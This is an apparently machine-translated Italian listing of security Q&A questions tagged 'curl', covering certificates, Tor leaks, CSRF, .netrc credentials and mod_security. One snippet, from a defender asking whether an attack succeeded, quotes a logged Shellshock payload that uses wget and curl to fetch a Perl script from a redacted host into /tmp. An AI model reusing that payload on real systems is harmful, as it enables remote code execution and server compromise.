Domande con tag 'curl'

1
risposta

Perché non vi sono errori di certificato durante la visita a google.net anche se presenta un certificato rilasciato a google.com?

Il seguente output mostra che google.net presenta un certificato che è stato rilasciato a www.google.com . $ openssl s_client -connect google.net:443 < /dev/null > out.txt 2>&1; cat out.txt depth=2 /C=US/O=GeoTrust Inc./C...
posta 10.07.2017 - 05:55
6
risposte

Come posso ispezionare in sicurezza un sito Web potenzialmente dannoso?

A volte sono interessato a cosa c'è dietro un sito Web dannoso. Come posso stare dalla parte della sicurezza se decido di ispezionare? Sto cercando metodi più rapidi e più semplici rispetto all'utilizzo del sito Web su una macchina virtuale....
posta 26.04.2016 - 19:04
2
risposte

La richiesta di arricciatura non filtrata di un sito Web è vulnerabile?

Recentemente ero su un sito web che offriva alcune funzionalità non-sense: Inserisci un URL premi invio L'origine HTML di un determinato URL viene visualizzata Fondamentalmente ha recuperato un URL e ne ha semplicemente scaricato il c...
posta 01.08.2015 - 16:05
1
risposta

Shellshock Exploit evidence: è un attacco riuscito

Stavo controllando i log oggi e ho notato quanto segue: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
posta 27.12.2016 - 02:36
1
risposta

Il vero indirizzo IP può perdere usando Curl via Tor?

Dopo aver visto Tor tramite Python - può la perdita reale dell'indirizzo IP? Non sono più sicuro se utilizzare o meno curl -L --insecure -C - --socks5 localhost:9150 -H "User-Agent: " check.torproject.org è sicuro quanto la versione...
posta 03.07.2017 - 19:55
1
risposta

Restituisce il server "Impossibile separare la maschera di rete dall'espressione target"

Sono interessato a rendere il mio sito Web molto più sicuro e, mentre gioco sulla scansione di altri siti web, ho scoperto che un sito web risponde a nmap traceroute , curl e wget comandi di console in tale modo che restituisc...
posta 11.08.2016 - 15:43
2
risposte

Esiste una valida tecnica di prevenzione lato server contro CSRF supportato da PHP?

Inizierò col dire: sono solo un appassionato di sicurezza informatica, non un esperto. Quindi, affermerò quello che penso di conoscere fino ad ora, per favore sentiti libero di correggermi in qualsiasi momento. Attraverso le mie letture, ho i...
posta 23.05.2016 - 17:06
2
risposte

È sicuro usare i file .netrc per memorizzare le credenziali per strumenti come curl o ftp?

Il file .netrc può contenere credenziali di nome utente e password per vari siti, per consentire una più semplice invocazione di strumenti. Ad esempio, arricciare con l'opzione -n leggerà le credenziali dal file, per il sito di destinazione spec...
posta 21.07.2015 - 23:41
1
risposta

Prevenzione dello spoofing del server remoto con PHP & cURL

Sto scrivendo uno script PHP che richiede dati riservati da un server remoto. Sto usando cURL per ottenere le informazioni sul certificato del server remoto (per il suo output, vedi sotto). Quali chiavi di array devo verificare la validità de...
posta 27.10.2012 - 22:43
1
risposta

Mod_security per Apache2 blocca cURL!

Sto cercando di far tornare i miei utenti lat. e lng. dal loro indirizzo utilizzando l'API di geocodifica di Google, ma quando mod: la sicurezza è abilitata, la impedisce e lo script scade. Come posso aggiungere un'eccezione per IP o dominio per...
posta 26.06.2011 - 01:16